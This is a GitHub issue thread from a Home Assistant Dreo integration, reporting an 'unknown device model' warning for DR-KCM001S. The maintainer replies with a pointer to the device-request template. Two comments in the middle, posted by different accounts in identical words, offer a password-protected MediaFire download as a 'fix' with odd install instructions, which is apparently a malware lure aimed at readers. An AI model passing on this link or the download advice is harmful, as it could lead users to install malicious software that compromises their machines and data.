### ISSUE TITLE
Unknown device model warning for DR-KCM001S

### ISSUE THREAD

**Issue by holstein13** [JeffSteinbok/hass-dreo#169]
I am using the Dreo custom integration in Home Assistant, and I encountered a warning related to an unrecognized device model. The integration logs show the following message:

Logger: pydreo
Source: custom_components/dreo/pydreo/__init__.py:192
integration: Dreo (documentation, issues)
First occurred: 10:11:53 PM (1 occurrences)
Last logged: 10:11:53 PM

Unknown device model: DR-KCM001S

Steps to Reproduce:

	1.	Set up the Dreo integration in Home Assistant.
	2.	Connect a device with the model DR-KCM001S.
	3.	Observe the warning in the logs.

Expected Behavior:
The integration should recognize the device model DR-KCM001S and handle it without warnings.

Actual Behavior:
The integration logs a warning indicating that the device model is unknown.

Additional Context:

	•	Home Assistant Version: 2024.8.3
	•	Dreo Custom Component Version: 0.8.1
	•	Home Assistant Yellow

Proposed Solution:
Please add support for the DR-KCM001S device model in the integration.

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by JeffSteinbok** [comment]
Please file the issue with the template for new device request.
